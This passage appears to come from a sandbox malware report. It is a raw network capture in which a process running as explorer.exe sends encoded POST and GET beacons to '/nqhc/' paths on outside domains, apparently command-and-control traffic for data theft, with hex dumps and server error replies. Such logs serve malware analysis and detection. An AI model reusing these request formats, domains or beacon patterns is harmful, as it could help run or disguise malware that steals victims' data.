                                                                                                                                                                          Dec 5, 2022 15:15:30.351489067 CET11263OUTData Raw: 36 4f 59 4b 57 32 6c 59 2d 76 50 42 2d 38 76 79 71 46 75 28 6c 50 38 28 5a 74 70 45 6e 7a 74 4a 53 35 46 6c 56 7a 73 78 49 71 4f 65 49 32 36 69 34 46 67 38 50 77 7a 77 6c 6f 6f 48 4b 38 46 74 48 30 71 4f 59 76 7a 72 44 77 74 31 6c 77 31 46 67 59
                                                                                                                                                                          Data Ascii: 6OYKW2lY-vPB-8vyqFu(lP8(ZtpEnztJS5FlVzsxIqOeI26i4Fg8PwzwlooHK8FtH0qOYvzrDwt1lw1FgYh~RkFKyWjWVtbar53SLTWgsl5fUmWOS~pVSJC5yXj~z9m(5sHZXhB8M8vnV6JlTvGx343Oll3hidVSUikl9jyrENFo3ZFbJ6vj0Munk23rw6YPzMG40(QuKR7AgJUJYkMEFExMpvpujrI4-gtypeax-Tcx047Sc~Z
                                                                                                                                                                          Dec 5, 2022 15:15:30.351578951 CET11273OUTData Raw: 43 61 59 51 68 70 4f 28 54 32 74 56 51 56 61 6e 4b 33 48 6f 78 68 59 66 62 34 74 5a 78 69 4f 61 56 43 6f 68 6b 51 79 56 2d 51 5f 46 61 37 79 57 6f 55 4d 54 6c 51 4c 4d 61 65 6e 54 35 72 57 32 42 48 64 7e 69 67 34 33 47 67 49 4d 37 52 42 34 46 62
                                                                                                                                                                          Data Ascii: CaYQhpO(T2tVQVanK3HoxhYfb4tZxiOaVCohkQyV-Q_Fa7yWoUMTlQLMaenT5rW2BHd~ig43GgIM7RB4FbeWbo7ZXim~_a8O6JdFevwt-0YLB5gHBbM51mvAJ4KFV9mqVbbjcTUdv6bXJi2pRzt8yDz9boeKQ2DgLccGFjnGt~AxcwuMju6VEjnh8Cu9QrSW_~cVnLGz-pjvrgluitrNcNi3iTExT9GMwIOfiNLzufmpHQrrRRt
                                                                                                                                                                          Dec 5, 2022 15:15:30.351654053 CET11275OUTData Raw: 38 56 66 47 79 33 38 7e 48 72 71 31 67 55 6b 55 79 6b 4a 55 48 4a 78 6a 72 42 73 4f 52 57 48 65 70 4f 59 4f 62 6a 49 34 41 31 4e 35 45 47 59 67 63 55 5a 6b 6a 28 5f 65 37 74 37 4e 44 51 33 44 38 73 53 41 54 68 47 48 53 38 6a 59 54 57 4c 76 5f 41
                                                                                                                                                                          Data Ascii: 8VfGy38~Hrq1gUkUykJUHJxjrBsORWHepOYObjI4A1N5EGYgcUZkj(_e7t7NDQ3D8sSAThGHS8jYTWLv_AdY_xgSIDq(R8X85u-OIx2R68zmj0ZJjD8zDgrpTpJ9oCFDlNBKbcmhpcALcXoJl9JkxE0070CYXkctf4x8cJh2MN1IoX6bsl3Lehsmu2xVvVY0yqpvmNZNtMQX2Nizvyp3zkgFxqmyyJW4Lv9grI8WA73H_y8XhaT
                                                                                                                                                                          Dec 5, 2022 15:15:30.351881981 CET11282OUTData Raw: 77 34 5f 44 4e 7a 77 4f 67 42 4d 50 71 42 4f 34 68 50 38 38 37 34 6b 68 52 72 4e 67 6e 32 4a 31 72 7a 45 51 79 52 71 73 72 76 71 73 43 6d 7a 6d 56 6e 4d 74 58 67 70 66 6f 41 45 65 44 37 54 37 72 71 57 64 66 4a 34 7a 57 70 37 55 54 70 76 5a 56 78
                                                                                                                                                                          Data Ascii: w4_DNzwOgBMPqBO4hP8874khRrNgn2J1rzEQyRqsrvqsCmzmVnMtXgpfoAEeD7T7rqWdfJ4zWp7UTpvZVx92FkOMAKcB1HlzI(cmc5ozy1NWkQN(L3jYJba06Uk~6jE1exuKxHwZIlPAPSYEEVB1ltL6bUhoMBbA7nXXKdRxS6yXd7_BgUhaUIumX7A6ky9bOlzvctqLIJYR9fAfkHu2elswLhZyoX3WEPqYG68Vdttk3btgeg4
                                                                                                                                                                          Dec 5, 2022 15:15:30.352003098 CET11286OUTData Raw: 50 4a 77 58 75 7a 41 4d 36 6c 6c 7e 6c 32 78 58 34 4a 4b 44 5f 64 54 6f 5f 70 70 79 34 48 39 56 50 61 50 59 54 76 72 64 61 42 37 63 44 58 53 39 52 53 67 70 2d 37 73 31 66 4f 4e 68 6a 32 41 37 51 48 45 75 7a 6b 56 6f 37 6b 35 5a 5f 6a 63 53 64 6a
                                                                                                                                                                          Data Ascii: PJwXuzAM6ll~l2xX4JKD_dTo_ppy4H9VPaPYTvrdaB7cDXS9RSgp-7s1fONhj2A7QHEuzkVo7k5Z_jcSdjQS_wSzsEF1-mGn8dF6ujMI0niaiqw6nc7Dw(BUffk3chpDu3ktZ3kfavWt-WxqeJ6zo7WbqpFxBbkj16o97HlsdqaZMReLw2Wb8U7AtbS0EftGYIk~-b7XyFmUXU-PMSP(8~Ele24jZDy5xMMV2VpIYpkxFXrob3s
                                                                                                                                                                          Dec 5, 2022 15:15:30.468168974 CET11289OUTData Raw: 64 57 6b 4f 34 6a 44 35 49 77 42 33 6c 32 54 71 49 51 46 66 43 56 64 6a 43 66 46 61 31 4e 49 7e 78 59 36 4e 56 42 65 32 38 4c 54 4e 70 44 4b 7a 53 4f 74 52 6b 4c 76 51 44 54 77 62 79 38 52 33 4c 64 6b 6b 62 65 69 50 78 28 68 48 50 76 75 54 59 63
                                                                                                                                                                          Data Ascii: dWkO4jD5IwB3l2TqIQFfCVdjCfFa1NI~xY6NVBe28LTNpDKzSOtRkLvQDTwby8R3LdkkbeiPx(hHPvuTYcqmtcMW58ppTX3mdAavYFi2_~oSqDZ4dM2LuVyorx96pi6jM5HAcJJzmhxTnHO(TPU(bWQMBDxjBG1oy5VLhf3OEOqY_OeWXzyM7QmOdyc30occgxZ01YAvPXkCYFe1hZ29q7KFjcQupsSObyll6fZlJ0C~gMlP23_
                                                                                                                                                                          Dec 5, 2022 15:15:30.468250990 CET11292OUTData Raw: 62 33 58 44 78 33 4c 35 59 38 45 79 46 36 34 61 6f 73 6d 66 75 62 5f 6c 6d 70 46 58 2d 56 36 66 36 35 46 4e 75 79 4d 6b 6c 70 55 4d 39 44 44 38 4e 34 61 76 69 6f 7a 53 52 59 35 46 32 52 78 73 70 30 55 62 44 35 62 61 69 45 42 64 65 41 41 42 72 74
                                                                                                                                                                          Data Ascii: b3XDx3L5Y8EyF64aosmfub_lmpFX-V6f65FNuyMklpUM9DD8N4aviozSRY5F2Rxsp0UbD5baiEBdeAABrt6UldsQCtcPqr6UB0ZLY1TuOw41E8hY8BrMysvjLG3c-Iqe-peJezWdVCULwUrW2rA7ucx0ZSopkRJtrl9cJzeYjdinn3mywyU(g6sZGKfAT4Z7WXuJzG-ROaylGNs04B8OV7YgUf7(e~Bnpn2n-jgm9pTNmEZhIJQ
                                                                                                                                                                          Dec 5, 2022 15:15:30.468493938 CET11300OUTData Raw: 7a 43 57 67 53 66 52 73 64 37 4d 4c 53 6e 67 41 56 43 67 67 78 63 68 5a 4d 4b 37 6c 46 77 6c 6d 61 6c 73 34 73 37 74 43 30 74 5f 6a 30 6c 50 79 32 6a 6e 72 51 52 63 52 57 76 74 4f 46 74 32 70 50 44 6c 75 6c 4b 71 6a 65 67 43 77 62 28 37 77 4f 45
                                                                                                                                                                          Data Ascii: zCWgSfRsd7MLSngAVCggxchZMK7lFwlmals4s7tC0t_j0lPy2jnrQRcRWvtOFt2pPDlulKqjegCwb(7wOEdEzTydvlKyscSuIG8XsKJrvbRkIUo(yEh6U7Cx3P5BffYcOG0pc6cLx9XJvUGRLEAnqpXMxwJCYSM~ro7uQrcndh5qUbvIRPJLNV_h4vAr-IPwfS8g6XhGnpHAketsnWDQ2~vPkJDz-NtqfEVyqVA(SLFlTf3qE5_
                                                                                                                                                                          Dec 5, 2022 15:15:30.724493027 CET11302INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:30 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                          Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                                                          Content-Length: 13070
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a 62 64 67 a7 ea ee 4d 5b e4 4c 4f f7 ea d5 ab 57 ff d9 d7 6f cf df ff e3 c7 57 24 35 19 1f ee ee f6 ed 2f 89 99 1a 38 dc 28 87 70 2a 92 81 03 c2 fd e9 c2 d9 dd c9 15 8c d8 f5 c0 91 49 0f 0b 4c ae 7b be 2f 93 dc cb c0 17 fa b9 43 10 60 a7 9f 02 8d 87 bb 3b 84 ec f4 33 30 94 44 29 55 1a cc c0 f9 e9 fd 37 ee 89 b3 fc 24 68 06 03 67 cc 60 92 4b 65 1c 12 49 61 40 60 ea 84 c5 26 1d c4 30 66 11 b8 e5 a5 ae db dd d9 e9 3f 73 5d f2 82 73 c2 04 79 2b 80 5c bc 7a 4b 3a 5e cb 3b f6 02 e2 12 ca a4 06 e9 45 32 23 ae 3b b4 e9 4b 9d 94 0c a5 d1 4b 7d 84 64 22 86 6b 87 f8 77 53 13 10 a0 a8 91 6a 29 fb 4e d3 fd 17 df bf c5 df 83 79 f7 19 8c 8e 14 cb 0d 31 d3 1c 81 68 9e 73 16 51 c3 a4 f0 79 7c f8 51 4b 81 90 9c 6a 8d 6f 25 59 57 47 29 64 d4 4e b8 b3 73 e3 fc 47 d9 ef da 38 3d a7 d2 f8 83 ff c1 af 52 3c a9 12 a7 e1 fc 47 a2 68 9e 3a bd 5f 30 d9 36 c1 cc 97 0a 55 8f 54 91 85 af 99 36 36 87 c5 2b 00 4a 4e 29 37 10 a5 09 97 21 e5 56 a0 0f be f8 2d 8d 3e f8 cf c3 79 31 af 8a 99 81 cc e2 bc e2 90 e1 e4 2b 9d 6c fc 7b 7c df b6 c7 73 be 28 c8 a5 66 56 08 a7 17 54 4d 9c de 02 f8 67 08 7f a4 09 6c 8b 8b 79 76 53 98 f8 9d cc 6c 55 a1 f8 16 55 b7 58 86 e2 96 84 b6 d5 67 3e c1 6d e3 e9 3a dc c5 5a 56 a3 f5 c9 6a 54 e8 0b 4d 7e 90 86 7c 23 0b 11 6f 2b 4c 0d 80 f2 e4 0a c6 4c 16 7a 3b 89 96 c4 f9 75 59 9e b7 2a a1 82 fd 5e fa 7e 6b ab c8 d5 a2 7a 96 77 36 97 bc c7 64 f2 6d 99 bd f5 b2 1b 0e 97 89 5c 96 f5 fb 0c 45 7d 1b 7e 84 c8 6c 8b 32 c9 dd 48 0a 03 c2 7c f0 8b 9c 4b 1a eb 0f 7e ab d9 6a 7d f0 83 e0 83 1f 29 99 e7 10 bb af b1 d3 1b 7a a5 dc c0 cb 45 f2 a4 91 2d 04 16 4e 58 6c 52 34 45 a7 d9 70 52 60 49 6a 9c 5e a7 8d 9b 61 96 7c 39 cd d3 a0 6f 97 17 f4 24 83 3d 9f 40 98 57 55 7f c4 55 48 5d bc a6 22 29 4a fe 0e 08 f7 a7 0b 1b d4 3f 52 65 de 8e b6 1f 09 db 6b 66 c0 da 34 54 40 e3 48 15 59 b8 75 79 3d c3 a2 d2 7a f7 9e 2a 17 b6 c1 b6 eb 9b 11 da de 91 1b 4c bd 56 a4 bc b0 34 53 50 4f 5b 3c 8e f7 eb ed ee ce 4e df d7 91 62 b9 19 da f3 33 d7 25 2f 38 27 4c 90 b7 02 c8 c5 ab b7 c4 75 87 bb bb bb d5 d3 fb 94 69 62 c7 22 f8 2b 73 c3 32 f6 3b c4 64 c2 4c 4a 4c 0a e4 1f 92 6a 53 56 e5 bc 48 10 64 1c 9c 7a 41 40 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03
                                                                                                                                                                          Data Ascii: rksg1\- "c+;OR&0`bto$bdgM[LOWoW$5/8(p*IL{/C`;30D)U7$hg`KeIa@`&0f?s]sy+\zK:^;E2#;KK}d"kwSj)Ny1hsQy|QKjo%YWG)dNsG8=R<Gh:_06UT66+JN)7!V->y1+l{|s(fVTMglyvSlUUXg>m:ZVjTM~|#o+LLz;uY*^~kzw6dm\E}~l2H|K~j})zE-NXlR4EpR`Ij^a|9o$=@WUUH]")J?Rekf4T@HYuy=z*LV4SPO[<Nb3%/8'Luib"+s2;dLJLjSVHdzA@\R1lTq@kvCkC"!#YQiL,P+2#H
                                                                                                                                                                          Dec 5, 2022 15:15:30.724586010 CET11303INData Raw: c2 0c 50 b9 4b 54 8e f8 eb d3 4b a4 a5 ec c7 bb 3f 08 65 25 ba 2c f7 b9 80 7b a8 ba 52 9f 58 9b 0d 1c 9a e7 9c 45 e5 7e 7c 1e 1f 7e d4 b8 27 12 71 aa f5 c0 29 a5 73 75 94 42 46 dd 44 d1 3c 75 86 b8 f8 b2 c1 b5 99 6f df f7 ab 14 0f 97 6d dd 5a 65
                                                                                                                                                                          Data Ascii: PKTK?e%,{RXE~|~'q)suBFD<uomZe~y:<MC5^dUQ"@f~h8LNx%(0h!95FTvb"t~+@M]&.CoS~ska5IF.vy%W+6lcmre#DV
                                                                                                                                                                          Dec 5, 2022 15:15:30.724653959 CET11304INData Raw: ef 07 bd 7d cc 30 86 46 69 99 b4 ef 48 51 3f 1f d8 de ab 2f 25 3b 6d a8 81 28 a5 22 01 a7 b1 44 de 89 64 96 73 30 e0 0c 06 03 5a 4d 72 61 73 ed 62 ee ce 75 70 d0 d8 07 2b bf 2c 54 04 ff fb bf 37 b7 07 5e 24 45 84 e9 d6 ba 5f 45 48 6b e9 7e d0 03
                                                                                                                                                                          Data Ascii: }0FiHQ?/%;m("Dds0ZMrasbup+,T7^$E_EHk~o/Lo{n'LreTd8A{uKg}_Gffi#.vu8L!7;19a30g;T1SH&]J&iz9"]
                                                                                                                                                                          Dec 5, 2022 15:15:30.724718094 CET11306INData Raw: 0b dc 1e 83 94 c7 25 a4 2d cb 2a de 38 08 fa 6e da ab 3d 50 96 3d b2 8a 8c 19 37 2c 90 a5 58 16 b3 65 d5 9c a1 3d 0a a3 e0 b7 82 29 88 5d eb b4 b5 24 e6 76 3a cb 69 1c 33 91 2c 3c 5e 8a dc f4 da 9b d7 25 c5 85 e5 aa 35 43 a2 29 b0 24 35 25 c4 13
                                                                                                                                                                          Data Ascii: %-*8n=P=7,Xe=)]$v:i3,<^%5C)$5%M;bJhEESqFQGReP[4l"j,(#hSrcT,o=%'gt/a@5:[W-A9u(Uf%g,I.UOb5.vQEcV^Fht(YFn7n8=!
                                                                                                                                                                          Dec 5, 2022 15:15:30.724781990 CET11307INData Raw: b5 4f 36 a4 9c 60 4a d7 6b 1e d9 94 db de 24 05 05 fb 1e d3 28 c4 54 16 c6 1d 71 b8 3e b8 49 68 6e 07 ea da 9c 50 c6 53 b2 92 21 27 64 48 3c ca 59 22 38 8c cc 0d 46 28 5a d8 9e cf 32 d4 93 09 97 09 ce 70 ed da 50 85 2f cd 3b 61 10 31 8e f2 28 b8
                                                                                                                                                                          Data Ascii: O6`Jk$(Tq>IhnPS!'dH<Y"8F(Z2pP/;a1(bI:G//-G#M]i-$XKe+IH!$Z+.Xmf!];aI{dLNrrpr28ppgVlbi_&f:{9(>+)@{
                                                                                                                                                                          Dec 5, 2022 15:15:30.724844933 CET11308INData Raw: ca 1f 3e a2 87 17 9c 86 87 6f 45 75 e7 85 a2 75 31 5e 85 91 c2 fe aa 28 65 a8 91 d1 87 5f d3 02 9d 0d 6a 16 1d 4b cc 0e ca 56 81 6d d5 3a 6f 95 97 56 75 69 97 97 76 75 59 62 d4 3a ef 96 97 6e 75 39 2a 2f 47 d5 e5 b8 bc 1c 57 97 93 f2 72 52 5d 4e
                                                                                                                                                                          Data Ascii: >oEuu1^(e_jKVm:oVuivuYb:nu9*/GWrR]Ni=b\sKT[AP~NjD>4:L*fe',T?nK*PKYH\2KfqR^@DL,tr|~NC&hs'YP2mT
                                                                                                                                                                          Dec 5, 2022 15:15:30.724910975 CET11310INData Raw: 7b 24 83 98 d1 c1 1e e5 7c 8f f8 c3 dd 3e 67 e2 8a e0 4e 06 7b 1a 9d 0e 3a 05 30 7b 84 c5 83 bd f1 c4 8d a9 ba 72 43 2e a3 2b b7 7c 75 4b 88 54 c1 68 b0 97 1a 93 f7 7c 5f c9 29 e5 06 a2 34 e1 32 a4 dc 8b 64 e6 4f 72 37 92 c2 80 30 be 49 21 03 ed
                                                                                                                                                                          Data Ascii: {$|>gN{:0{rC.+|uKTh|_)42dOr70I!X>LV{xOSc@]O0|B)63?aT31.Q(AJL5;HP^Gf(;)A"{sY&f:tR-i+r+\8c
                                                                                                                                                                          Dec 5, 2022 15:15:30.724975109 CET11311INData Raw: 0f 95 49 ac 91 87 ff 3f fb fd df 56 0f b6 f6 76 b0 b5 99 83 7f bb f7 9f e2 de bc 50 39 07 77 0a 1c ab fe 55 1d ec 75 3b a7 cd e0 f4 a8 79 7c d2 69 db a6 de e9 c9 49 ab dd 6d 9d 76 82 e0 f8 a8 fb f9 fd ed 1d 23 6e e7 b8 d9 2d fb b4 b1 63 6b 85 c3
                                                                                                                                                                          Data Ascii: I?VvP9wUu;y|iImv#n-ck8A_\24&ZB*oS9Dj0Q_:=L&Ifip&/MZZ><dTh;Qq"%E yh31,d7#4?cP#
                                                                                                                                                                          Dec 5, 2022 15:15:30.725038052 CET11312INData Raw: aa 11 bb c6 e9 0b 5e 91 c5 b0 1b 2c ac 5c 27 d4 fb b9 2c 19 f7 39 5b e4 22 df cc 0d ba 0b a2 b3 20 59 3c 9b 69 0e 6e 54 68 23 97 a3 32 fc 08 91 b9 1f 47 b0 61 9f 92 54 c1 08 ed 64 4c ae 7b be af e4 94 72 03 51 9a 70 19 52 ee 45 32 73 86 df c9 0c
                                                                                                                                                                          Data Ascii: ^,\',9[" Y<inTh#2GaTdL{rQpRE2s>p6]CqZ3iEx4q;H~YV[04yW|V'[2f4Gx$ohd+6+8dvWp,1Ic#rK7#F\j GCj
                                                                                                                                                                          Dec 5, 2022 15:15:30.725106001 CET11314INData Raw: 26 ed fb d5 6b 99 7d 27 75 6f 93 75 5b cd 56 cb 0f 02 7f 6f 48 7e 90 63 c8 42 50 c4 c6 c8 12 e2 1f 86 6b 5a b8 b7 91 91 9f 03 ad 79 6a d1 2e 20 37 9f 87 5d f3 c4 e2 bd 28 92 42 9b 4f 07 3b b6 60 ff 59 f0 e9 a7 43 1d 55 50 02 3e 1d aa 6b a1 de d0
                                                                                                                                                                          Data Ascii: &k}'uou[VoH~cBPkZyj. 7](BO;`YCUP>k@S+?]BB}]/})b9?1p?_BYr3J2 08>q,6CvwfxDyJEyATs@g#
                                                                                                                                                                          Dec 5, 2022 15:15:30.841444969 CET11315INData Raw: e4 a1 db 76 96 11 77 ca 82 f9 08 f9 54 d9 11 49 24 85 a1 0c 07 75 d6 b0 ca 67 f9 59 e8 36 9d 21 ea 5e 8a 3c d3 78 32 99 78 e3 09 1a 21 03 5d 0a 5c 1d fd 91 02 70 63 aa ae dc 89 54 71 ae 40 6b b7 7c f2 89 a1 2a 01 33 d8 bb 0c 39 15 57 7b c3 af 31
                                                                                                                                                                          Data Ascii: vwTI$ugY6!^<x2x!]\pcTq@k|*39W{1Y?,f\^q}n<k#%9/rb#\JrWl,*\?.JHS^-rWXzD,7LsYG:Uti/$I]"q?j#g


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          14192.168.11.2049850192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:32.371812105 CET11315OUTGET /nqhc/?7nWHV=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.royaltechglobal.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:15:32.666039944 CET11316INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:32 GMT
                                                                                                                                                                          Server: nginx/1.23.2
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                          X-Redirect-By: WordPress
                                                                                                                                                                          Location: http://royaltechglobal.com/nqhc/?7nWHV=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&t0D=yFNHS0IX
                                                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                                                          X-Server-Cache: true
                                                                                                                                                                          X-Proxy-Cache: MISS


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          15192.168.11.204985238.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:48.023472071 CET11324OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.xiaoxiuzhen.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.xiaoxiuzhen.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.xiaoxiuzhen.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 41 6b 61 4d 58 5f 51 6b 64 4c 66 56 66 61 4d 5f 6d 5a 4f 34 66 74 76 48 31 61 4f 4e 47 2d 55 4e 30 75 54 36 48 42 64 55 46 73 56 41 5a 72 46 4b 71 72 49 34 49 46 38 58 6b 56 71 49 44 53 6f 37 48 59 66 6d 76 6c 53 46 63 62 37 6c 66 7a 36 4c 4c 6a 4c 4e 7e 50 69 45 77 6f 67 37 30 34 5a 51 47 53 75 6c 4a 4f 5a 5f 47 33 41 6e 39 7a 78 65 63 33 34 76 69 56 75 78 43 30 5a 65 35 71 37 57 52 72 44 33 31 4d 6b 59 73 56 30 46 6e 77 75 55 63 75 54 48 35 37 42 54 73 5a 4a 36 6a 6e 6e 59 6a 61 34 5a 65 32 42 37 6b 64 47 49 7e 49 71 63 59 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=AkaMX_QkdLfVfaM_mZO4ftvH1aONG-UN0uT6HBdUFsVAZrFKqrI4IF8XkVqIDSo7HYfmvlSFcb7lfz6LLjLN~PiEwog704ZQGSulJOZ_G3An9zxec34viVuxC0Ze5q7WRrD31MkYsV0FnwuUcuTH57BTsZJ6jnnYja4Ze2B7kdGI~IqcYQ).
                                                                                                                                                                          Dec 5, 2022 15:15:48.220068932 CET11324INHTTP/1.1 400 Bad Request
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:48 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: d404 Not Found0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          16192.168.11.204985338.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:50.214092016 CET11325OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.xiaoxiuzhen.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.xiaoxiuzhen.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.xiaoxiuzhen.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 41 6b 61 4d 58 5f 51 6b 64 4c 66 56 65 36 38 5f 71 59 4f 34 4f 4e 76 45 7e 36 4f 4e 55 2d 55 4a 30 70 62 36 48 46 45 66 47 65 78 41 5a 4b 31 4b 70 76 6b 34 50 46 38 58 73 31 71 4e 63 43 6f 30 48 59 53 62 76 67 71 46 63 59 48 6c 65 41 79 4c 63 6a 4c 4b 78 76 69 44 33 6f 67 6d 28 59 5a 4f 47 53 54 45 4a 50 4e 5f 47 48 73 6e 38 78 70 65 57 47 34 73 7a 6c 75 33 56 6b 5a 66 75 36 37 69 52 72 65 4b 31 4f 30 6d 73 6a 55 46 6d 51 4f 55 64 75 54 59 78 4c 42 59 6a 35 49 5f 6b 6d 54 49 71 72 41 70 41 31 52 45 38 75 48 4a 37 4c 76 67 47 39 30 75 4d 47 64 53 30 6b 48 4a 46 76 4d 58 48 78 37 55 7e 64 6e 76 7e 61 59 71 63 35 6e 4c 28 56 5a 6c 35 4e 34 6a 74 6c 65 62 51 50 63 39 6d 61 77 35 6b 66 53 6e 72 6c 34 57 38 42 33 61 54 66 6d 72 49 72 6d 6c 42 68 65 45 7a 38 44 38 70 45 41 74 51 32 63 64 72 34 44 4b 42 46 30 58 4a 7a 41 6e 44 33 70 39 59 55 39 61 46 66 53 73 4f 48 6f 58 6f 52 42 36 35 34 65 7a 79 49 65 4a 62 6d 64 48 52 2d 4a 66 32 44 4d 66 63 52 69 6f 37 7a 6b 77 51 71 28 68 4a 6b 79 45 63 47 6d 6c 74 70 6d 6b 64 73 59 57 57 53 63 79 4a 33 5a 72 71 6f 69 67 28 70 36 75 42 39 34 5a 37 4a 64 7a 75 70 56 57 35 79 4f 43 6a 70 49 62 34 64 67 46 41 31 44 43 55 77 46 69 35 30 46 52 72 4e 4a 54 4b 75 32 38 43 37 72 74 70 6e 48 57 49 35 4a 35 6b 6e 73 61 66 5f 58 4e 6e 30 59 34 6d 43 65 74 58 71 65 42 4c 4e 30 33 31 34 46 68 5a 6a 64 39 61 64 7e 64 4e 4a 39 76 6f 77 49 4c 6d 5a 76 7a 68 52 6f 61 34 6d 58 51 46 41 77 68 4e 41 68 31 69 68 7a 52 44 4e 57 5a 4e 53 77 58 69 6b 63 62 6f 74 6f 32 41 34 66 65 72 4c 57 74 56 66 6a 53 31 74 4a 30 68 48 63 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=AkaMX_QkdLfVe68_qYO4ONvE~6ONU-UJ0pb6HFEfGexAZK1Kpvk4PF8Xs1qNcCo0HYSbvgqFcYHleAyLcjLKxviD3ogm(YZOGSTEJPN_GHsn8xpeWG4szlu3VkZfu67iRreK1O0msjUFmQOUduTYxLBYj5I_kmTIqrApA1RE8uHJ7LvgG90uMGdS0kHJFvMXHx7U~dnv~aYqc5nL(VZl5N4jtlebQPc9maw5kfSnrl4W8B3aTfmrIrmlBheEz8D8pEAtQ2cdr4DKBF0XJzAnD3p9YU9aFfSsOHoXoRB654ezyIeJbmdHR-Jf2DMfcRio7zkwQq(hJkyEcGmltpmkdsYWWScyJ3Zrqoig(p6uB94Z7JdzupVW5yOCjpIb4dgFA1DCUwFi50FRrNJTKu28C7rtpnHWI5J5knsaf_XNn0Y4mCetXqeBLN0314FhZjd9ad~dNJ9vowILmZvzhRoa4mXQFAwhNAh1ihzRDNWZNSwXikcboto2A4ferLWtVfjS1tJ0hHc.
                                                                                                                                                                          Dec 5, 2022 15:15:50.414236069 CET11326INHTTP/1.1 400 Bad Request
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:50 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: d404 Not Found0


